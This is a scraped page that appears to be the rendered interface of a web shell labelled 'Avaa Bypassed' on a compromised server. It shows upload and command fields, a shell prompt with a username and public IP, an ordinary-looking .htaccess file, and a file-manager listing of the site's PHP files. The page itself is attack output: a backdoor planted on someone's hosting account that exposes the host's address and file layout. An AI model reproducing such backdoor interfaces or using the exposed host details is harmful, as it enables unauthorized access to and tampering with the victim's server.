[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.12.163.23: ~ $
AddDefaultCharset utf-8

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*) index.php/$1 [L]

<IfModule mod_php5.c>
#php_value output_buffering 64000
#php_value variables_order GPCS
#php_flag implicit_flush 0
#php_flag register_argc_argv 0
#php_flag session.use_trans_sid 0
#php_flag expose_php 0
#php_flag display_errors 0
</IfModule>

# Below code is from http://gist.github.com/427761
# An .htaccess file for web performance and passing Page Speed and YSlow rules.

# Enable GZIP
<ifmodule mod_deflate.c>
AddOutputFilterByType DEFLATE text/text text/html text/plain text/xml text/css application/x-javascript application/javascript
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4\.0[678] no-gzip
BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
</ifmodule>

# Expires Headers - 2678400s = 31 days
<ifmodule mod_expires.c>
  ExpiresActive On
  ExpiresDefault "access plus 1 seconds"
  ExpiresByType text/html "access plus 7200 seconds"
  ExpiresByType image/gif "access plus 2678400 seconds"
  ExpiresByType image/jpeg "access plus 2678400 seconds"
  ExpiresByType image/png "access plus 2678400 seconds"
  ExpiresByType text/css "access plus 518400 seconds"
  ExpiresByType text/javascript "access plus 2678400 seconds"
  ExpiresByType application/x-javascript "access plus 2678400 seconds"
</ifmodule>

# Cache Headers
<ifmodule mod_headers.c>
  # Cache specified files for 31 days
  <filesmatch "\.(ico|flv|jpg|jpeg|png|gif|css|swf)$">
  Header set Cache-Control "max-age=2678400, public"
  </filesmatch>
  # Cache HTML files for a couple hours
  <filesmatch "\.(html|htm)$">
  Header set Cache-Control "max-age=7200, private, must-revalidate"
  </filesmatch>
  # Cache PDFs for a day
  <filesmatch "\.(pdf)$">
  Header set Cache-Control "max-age=86400, public"
  </filesmatch>
  # Cache Javascripts for 31 days
  <filesmatch "\.(js)$">
  Header set Cache-Control "max-age=2678400, private"
  </filesmatch>
</ifmodule>

Filemanager

Name Type Size Permission Actions
default Folder 0755
images Folder 0755
php53 Folder 0755
php56 Folder 0755
php71 Folder 0755
php81 Folder 0755
php82 Folder 0755
.htaccess File 1.95 KB 0644
GLOBALS.php File 4.51 KB 0644
_upgrade.php File 3.15 KB 0644
_upgrade.xml File 382 B 0644
edit.php File 4.44 KB 0644
edit.xml File 433 B 0644
feed.php File 32.99 KB 0644
fileindex.php File 183 B 0644
import.php File 4.32 KB 0644
index.php File 38.59 KB 0644
info.xml File 5.05 KB 0644
install.js File 921 B 0644
install.php File 9.11 KB 0644
install.xml File 1.01 KB 0644
md5 File 4.19 KB 0644
notes.txt File 4.44 KB 0644
pdf.php File 50.78 KB 0644
rdf.php File 562 B 0644